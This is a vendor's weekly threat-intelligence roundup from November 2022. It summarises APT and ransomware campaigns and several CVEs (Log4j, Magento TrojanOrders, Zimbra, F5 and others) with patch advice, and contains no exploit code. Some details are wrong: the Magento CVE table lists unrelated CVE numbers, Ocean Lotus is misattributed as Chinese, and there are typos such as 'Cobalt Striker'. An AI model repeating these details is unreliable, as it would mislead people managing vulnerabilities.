Ransomware Q2 & Q3 Report is live now!

CSW's Threat Intelligence - November 14, 2022 - November 18, 2022

Posted on Nov 14, 2022 | Updated on Nov 18, 2022 | By Supriya Aluri

This edition brings you early warnings, trending news about cyber threats, and the accurate threat context. Check out which threat group is on the rampage, what vulnerability it could soon weaponize, and more.

Why play catch up when you can fix this now?

Check out our podcast on the top critical threats of this week, hosted by David Rushton!

Trending Threats

Threats to Watch Out For

 

Trending Threats

CISA Warns Against Iranian APT Groups Attacking Federal Organizations

Iranian APT groups have recently begun targeting federal organizations and exploiting the Log4j vulnerability to gain access to their networks. In July 2022, the Federal Civilian Executive Branch (FCEB) was infiltrated after exploiting a Log4j vulnerability in an unpatched VMware horizon server. The attackers installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence. 

 

CISA posted a warning to all organizations asking them to patch all the vulnerabilities and to assume a "server compromised" mindset while looking for signs of infection.

 

Apache Log4j vulnerability CVE-2021-44228 is a critical zero-day code execution vulnerability which is exploited by many threat actors. Check out  our blog to learn more about this vulnerability.

CVE Details:

CVE: CVE-2021-44228

CVSS: 10 

CWE ID: CWE-400 | CWE-502 | CWE-20 | CWE-917

Exploit Type: RCE,DoS,WebApp,Other

Ransomware: MSIL/Khonsari.A | Conti | AvosLocker | TellYouThePass | 

APT Association: Bronze Starlight | HAFNIUM | OilRig | Earth Lusca | Winnti Group 

 

 

Magento Stores Under a Barrage of Cyberattacks

In the latest round of attacks, Magento store websites were taken down by at least 7 hacking groups. The attack is named TrojanOrders, and the Adobe vulnerability CVE-2022-24086 was exploited to gain access to the systems. CVE-2022-24086 allows unauthenticated attackers to execute code and inject RATs (remote access trojans) on unpatched websites. In the TrojanOrders attacks, the hackers create an account on the target website and place an order that contains malicious template code in the name, VAT, or other fields. Then, using PHP backdoor, they run commands. Once inside, they inject RATs to exploit further. 

In this case, the vulnerability was fixed 10 months ago by Adobe. Magento which relies on Adobe for many operations failed to patch this vulnerability even though the store is continuously under cyber attacks.

Note: The available patch for CVE-2022-24086 was bypassed and a new CVE identifier was assigned to the flaw, namely CVE-2022-24087. 

CVE Details:

CVE

V3 Score

V3 Severity

CVSS Score

CVSS Severity

CWE

CVE-2022-24807

5.9

MEDIUM

5.9

MEDIUM

CWE-1320

CVE-2022-24806

5.9

MEDIUM

5.9

MEDIUM

CWE-20

 

 

CISA Adds the Second MoTW Vulnerability to the KEV

Last week, CISA added CVE-2022-41091 to the KEV. This is one of the two Microsoft Mark-of-the-Web vulnerabilities. The other vulnerability, CVE-2022-41049 was added to the KEV catalog on November 14, 2022. The Mark-of-the-Web vulnerability allows files downloaded from the internet to be executed without a warning for users. Hackers can exploit this vulnerability to execute malicious files and gain access to the systems.

CVE Details

CVE: CVE-2022-41049

CVSS: 5.40

Patch Link: Download

 

 

Ocean Lotus APT Group carries out Several Malicious Campaigns 

Ocean Lotus is a Chinese APT group that targets countries in Asia, Middle East, and the US. In 2021, this group carried out many attacks by exploiting zero-day and N-day vulnerabilities, notably, CVE-2020-14882 (WebLogic remote command execution vulnerability) and CVE-2021-22986 (F5 BIG-IP iControl REST unauthorized remote command execution vulnerability) and another Jboss deserialization vulnerability. They used an encrypted CS payloader on a PowerShell Web Server for lateral movement within the victims’ network. Ocean Lotus also used a trojan horse, busybox, and dropbear to further infiltrate the system and steal data from the victims’ systems.

 

The group has also started using Cobalt Striker’s C2 server for malicious activities.

CVE Details

 

 

The Chinese APT Group Lotus Blossom Is Attacking Several Asian Countries

Billbug (aka Lotus Blossom), a Chinese cyber espionage group, has been around for more than a decade. In its recent attacks, Billbug targeted a certificate authority, several government agencies, and defense organizations in Asia. All these attacks are believed to be state-sponsored attacks. The group exploits public-facing applications with known vulnerabilities and deploys signed malware, making it difficult to detect or decrypt the HTTPS traffic. In one of its operations, the group used Stowaway, a rarely deployed multilevel proxy tool that helps pentesters bypass network access restrictions. Hannotag and Sagerunex are custom backdoors used to gain further access and execute commands in the victims’ systems. Billbug prefers exploiting CVE-2012-0158 and CVE-2017-11882, with over 1,000 exploits.

CVE Details

 

 

CISA Warns of Hive Ransomware

In its latest StopRansomware alert campaign, CISA warned organizations to look out for the Hive ransomware gang attacks. Till date, Hive ransomware group has claimed 1300 victims  including, Damart and Bell Canada. They have received approximately  US$100 million in ransom payments. The group has favored the exploits of Microsoft Exchange Servers CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207. They disable anti-virus programs, Windows Defender, etc., to stay longer and undetected in the victims’ networks. To exfiltrate data, they use a combination of Rclone and the cloud storage service Mega.nz. 

 

The Hive ransomware group is financially motivated and is very active in seeking out targets and extracting ransom. Organizations should patch the above mentioned vulnerabilities and take a defensive approach in warding them off.

CVE Details:

 

 

Threats to Watch Out For

 

CVE-2019-8561, CVE-2022-32895: PackageKit FrameWork Vulnerabilities in macOS

CVE-2019-8561 was discovered and patched in March 2019 by Apple. This vulnerability is present in the PackageKit framework and could be exploited to get privilege escalation and bypass SIP (System Integrity Protection) restrictions. Recently, researchers have found that this vulnerability still affected the later versions of macOS, Monterey and Mojave. Apple re-addressed this vulnerability in macOS Ventura with a new CVE,  CVE-2022-32895, on Oct. 24, 2022.

Since users who do not update their macOS may be vulnerable to root privilege escalation, signature bypassing, and SIP bypassing, they are recommended to update it immediately.

CVE Details

 

 

CVE-2022-34169: Integer Truncation Bug in JIT Compiler

A bug in the Java JIT compiler allows processing of untrusted XSLT programs during XML signature verification. A remote attacker will be able to execute code arbitrarily in many Java-based web applications and identity providers that support the SAML single-sign-on standard using this flaw. The bug is assigned with CVE-2022-34169. OpenJDK released a patch for this in September 2022

XML signatures and SAML are prone to attacks as their default configurations are not very secure. Hence, users should manually set up the configurations to limit unnecessary functionalities.

CVE Details

CVE: CVE-2022-34169

CVSS: 7.20

CWE ID: CWE-434

Exploit Type: RCE,PE,DoS,WebApp

Patch Link: Download

    

    

Zimbra Collaboration Suite (ZCS) Vulnerabilities Exploited

Zimbra has been under continuous attacks from hackers who target their ZCS vulnerabilities such as CVE-2022-24682, CVE-2022-27924, CVE-2022-27925, CVE-2022-37042, and CVE-2022-30333. In August 2022,  CVE-2022-27925 and CVE-2022-37042 suffered multiple breaches. In a recent attack, analysts revealed that three Java Server Pages (JSP) webshells were dropped by exploiting these vulnerabilities. The webshells allowed malicious files to be uploaded to a victim’s web server and allowed execution of remote code. 

Zimbra has patched these vulnerabilities and continues to urge its customers to apply the patches. 

CVE Details

 

 

RCE Vulnerability in Backstage Platform

A critical vulnerability in the open-source developer portal platform Backstage can allow attackers to arbitrarily execute code.  CVE-2022-36067, a VM2 sandbox escape flaw, is also called SandBreak. Backstage platform is used by many major organizations, including Netflix, American Airlines, Doordash, Palo Alto Networks, HP, Siemens, LinkedIn, and Booz Allen Hamilton.

CVE Details:

CVE: CVE-2022-36067

CVSS: 10 

CWE ID: CWE-913r

Affected Product Count: 1

Here's the patch  for the vulnerability. 

 

CVE-2022-41622 and CVE-2022-41800: F5 Vulnerabilities 

CVE-2022-41622 is an unauthenticated remote code execution via cross-site request forgery (CSRF) in BIG-IP and BIG-IQ. Here's the advisory for the vulnerability.

CVE-2022-41800 is an authenticated remote code execution via RPM spec injection affecting Appliance mode iControl REST. F5 released the security advisory for this vulnerability.

 

 

CVE-2022-35803 Patch Bypassed and Exploited

The Windows Common Log File System Driver vulnerability named CVE-2022-24481 was patched  by Microsoft on April Patch Tuesday (12 April 2022). In a recent attack, this patch was 

bypassed with an exploit that grants the attack escalated privileges. The new vulnerability is tracked as CVE-2022-35803. Microsoft patched this vulnerability in September 2022 to prevent the type confusion flaw. 

CVE Details:

CVE: CVE-2022-35803

CVSS: 7.8 

Affected Product Count: 19

Users are recommended to deploy this patch immediately.

 

 

Check out this section to track how these threats evolve!

 

We use our threat intelligence platform driven by Artificial Intelligence (AI) and Machine Learning (ML) models to analyze the vulnerabilities that hackers could potentially exploit. We warn our customers continuously about exposures and prioritize vulnerabilities to facilitate rapid remediation.

 

Follow our weekly blog and podcast to get proactive alerts on trending threats. Reach out to us if you need help managing your vulnerabilities and exposures.

Leverage our expertise and manage your threats continuously to stay safe from attackers.

Talk to Us!

Never miss a patch or an update with CSW's Patch Watch Newsletter. Subscribe now!

csw

Secure your environment from cyber-attacks!

Know How

incognito